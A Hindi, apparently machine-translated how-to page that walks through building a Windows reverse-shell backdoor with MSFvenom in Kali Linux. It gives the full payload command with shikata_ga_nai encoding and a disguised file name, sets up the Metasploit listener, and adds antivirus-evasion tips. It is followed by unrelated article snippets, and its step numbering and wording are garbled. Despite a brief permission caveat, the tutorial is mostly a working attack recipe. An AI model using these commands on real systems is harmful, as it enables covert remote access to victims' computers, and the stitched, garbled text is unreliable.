वीडियो: काली लिनक्स में MSFvenom का उपयोग करके लगभग पता लगाने योग्य पिछले दरवाजे का निर्माण कैसे करें
2024 लेखक: Gilbert Ryder | [email protected]. अंतिम बार संशोधित: 2023-12-16 17:32
एक पिछले दरवाजे का उपयोग सुरक्षा तंत्र को बायपास करने के लिए किया जाता है, अक्सर गुप्त रूप से और अधिकतर अनजाने में। MSFvenom, msfpayload और msfencode के संयोजन का उपयोग करके, एक बैकडोर बनाना संभव है जो रिवर्स शेल टीसीपी का उपयोग करके हमलावर से वापस जुड़ता है। पिछले दरवाजे को विकसित करने के लिए, आपको किसी भी एंटीवायरस सॉफ़्टवेयर से बचने के लिए अपने मैलवेयर के हस्ताक्षर बदलने होंगे। इस प्रोजेक्ट को कंप्यूटर की एक जोड़ी पर पूरा करें, जिसे एक्सेस करने की आपके पास अनुमति है, और इस प्रक्रिया में, आप कंप्यूटर सुरक्षा और इस तरह के पिछले दरवाजे के काम करने के तरीके के बारे में और जानेंगे।
कदम
चरण 1. काली को प्रारंभ करें और टर्मिनल कंसोल को चालू करें।
चरण 2. इंटरफ़ेस प्रदर्शित करने के लिए ifconfig टाइप करें और अपना आईपी पता जांचें।
चरण 3. एन्कोडर्स की सूची दिखाने के लिए msfvenom -l एन्कोडर्स टाइप करें।
आप एन्कोडर के रूप में x86/shikata_ga_nai का उपयोग करेंगे।
चरण 4. टाइप करें "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
-a x86 --platform windows उपयोग करने के लिए आर्किटेक्चर को निर्दिष्ट करता है।
-p windows/shell/reverse_tcp पेलोड को एम्बेड करने के लिए निर्दिष्ट करता है।
LHOST श्रोता का IP पता निर्दिष्ट करता है।
LPORT श्रोता पोर्ट को निर्दिष्ट करता है।
-बी "\x00" खराब चरित्र (शून्य बाइट्स) से बचने के लिए नामित करता है।
-e x86/shikata_ga_nai एन्कोडर नाम निर्दिष्ट करता है।
-f exe > helloWorld.exe प्रारूप आउटपुट को निर्दिष्ट करता है।
चरण 5. टाइप करें msfconsole Metasploit को सक्रिय करने के लिए।
अब आपने अपना पिछला दरवाजा बना लिया है। जब पीड़ित helloWorld.exe पर क्लिक करता है, तो एम्बेडेड शेल पेलोड सक्रिय हो जाएगा और आपके सिस्टम से कनेक्शन वापस कर देगा। कनेक्शन प्राप्त करने के लिए, आपको मेटास्प्लोइट में मल्टी-हैंडलर खोलना होगा और पेलोड सेट करना होगा।
चरण 8. मॉड्यूल की जांच के लिए शो विकल्प टाइप करें।
चरण 9. टाइप करें सेट LHOST 192.168.48.129।
"LHOST" श्रोता का IP पता निर्दिष्ट करता है।
चरण 10. टाइप करें सेट एलपोर्ट ४४४४।
"LPORT" श्रोता पोर्ट को निर्दिष्ट करता है।
चरण 11. टाइप करें रन और पीड़ित की मशीन से कनेक्शन की प्रतीक्षा करें।
चरण 12. पीड़ित के लिए helloWorld.exe पर क्लिक करने की प्रतीक्षा करें।
फिर आप पीड़ित की मशीन से सफलतापूर्वक जुड़ जाएंगे।
टिप्स
MSFvenom में -i का उपयोग करना एन्कोडिंग के पुनरावृत्तियों का प्रतिनिधित्व करेगा। कभी-कभी अधिक पुनरावृत्तियां AV सॉफ़्टवेयर से बचने में मदद कर सकती हैं।
आपने सीखा है कि MSFvenom का उपयोग करके पिछले दरवाजे को कैसे उत्पन्न किया जाता है और एन्कोड किया जाता है, लेकिन यह विधि आजकल कुछ AV सॉफ़्टवेयर के विरुद्ध पूरी तरह से काम नहीं करेगी। इसके पीछे का कारण MSFvenom में एक्ज़ीक्यूशन टेम्प्लेट हैं। एवी विक्रेताओं ने इन टेम्पलेट्स के स्थिर हस्ताक्षर जोड़े हैं और बस उनकी तलाश करें। इस समस्या का समाधान एक अलग निष्पादन टेम्पलेट या विभिन्न उपकरणों का उपयोग करना है।
एक E-6B मैनुअल फ़्लाइट कंप्यूटर वाटरप्रूफ, शॉक-रेसिस्टेंट है और इसमें बैटरी की आवश्यकता नहीं होती है, जिससे यह उड़ान के दौरान पायलटों के लिए एक आदर्श उपकरण बन जाता है। इस निफ्टी कोंटरापशन में कंप्यूटर और विंड साइड दोनों हैं। कंप्यूटर पक्ष एक गोलाकार स्लाइड नियम है जो समय, गति और दूरी, ईंधन की खपत, वास्तविक एयरस्पीड और घनत्व ऊंचाई को खोजने के लिए गुणा और भाग की समस्याओं का प्रदर्शन कर सकता है। पवन पक्ष एक घूर्णन डिस्क का उपयोग करता है, जिसे अज़ीमुथ प्लेट कहा जाता है, जिसे 360 डि
यह विकिहाउ गाइड आपको दो लोकप्रिय लिनक्स टेक्स्ट एडिटर्स में टेक्स्ट फाइल बनाना और संपादित करना सिखाएगी। लगभग सभी लिनक्स सिस्टम नैनो के साथ प्रीइंस्टॉल्ड आते हैं, जो एक सीधा-सीधा, उपयोग में आसान टेक्स्ट एडिटर है। यदि आपको नैनो पसंद नहीं है (या नहीं है), तो आप टेक्स्ट फ़ाइलों को संपादित करने के लिए वीआई (या सिस्टम के आधार पर विम) का भी उपयोग कर सकते हैं। वीआई और विम का उपयोग करना थोड़ा अधिक चुनौतीपूर्ण है, क्योंकि इसमें कई कमांड और दो अलग-अलग मोड हैं। कदम विधि 1 में से 2
कमांड प्रॉम्प्ट के माध्यम से वाईफाई पासवर्ड ढूंढना उन लोगों के लिए एक उपयोगी तरीका है, जो कमांड लाइन का उपयोग करने का आनंद लेते हैं, जो एसएसएच का उपयोग किसी कंप्यूटर या डिवाइस को विंडोज़ शेल के साथ दूरस्थ रूप से एक्सेस करने के लिए कर रहे हैं, या जो ऐसे कंप्यूटर पर हैं जो उनके पास नहीं है और प्राप्त करना चाहते हैं सिस्टम पासवर्ड का उपयोग किए बिना वाईफाई पासवर्ड। कदम विधि 1 में से 2:
डिजिटल कैमरों के युग में, आपको "अप्रचलित" 35 मिमी कैमरों का उपयोग करने का निर्देश देना अजीब लग सकता है। फिर भी, वहाँ बहुत से लोग हैं जो कलात्मक (और अन्य) कारणों से फिल्म की शूटिंग करना चुनते हैं। और लगभग हर चीज के लिए डिजिटल ईटिंग अप मार्केट शेयर लेकिन लैंडस्केप फोटोग्राफी के साथ, कमाल का 35 मिमी कैमरा गियर पहले से सस्ता है। आप में से और भी बहुत से लोग होंगे जो फ़िल्म कैमरों का उपयोग करना चाहते हैं, लेकिन उन्हें डराते हुए पाते हैं। हो सकता है कि आपने एक फिल्म कैमर
क्या आपने कभी सोचा है कि लिनक्स में कमांड लाइन में वेब पेज कैसे देखें? दो अलग-अलग टूल का उपयोग करके इसे कैसे करना है, यह जानने के लिए चरण एक से प्रारंभ करें। कदम विधि 1: 2 में से: W3M. का उपयोग करना चरण 1. टर्मिनल पर जाएं और यह कमांड टाइप करें sudo apt-get install w3m w3m-img। चरण 2.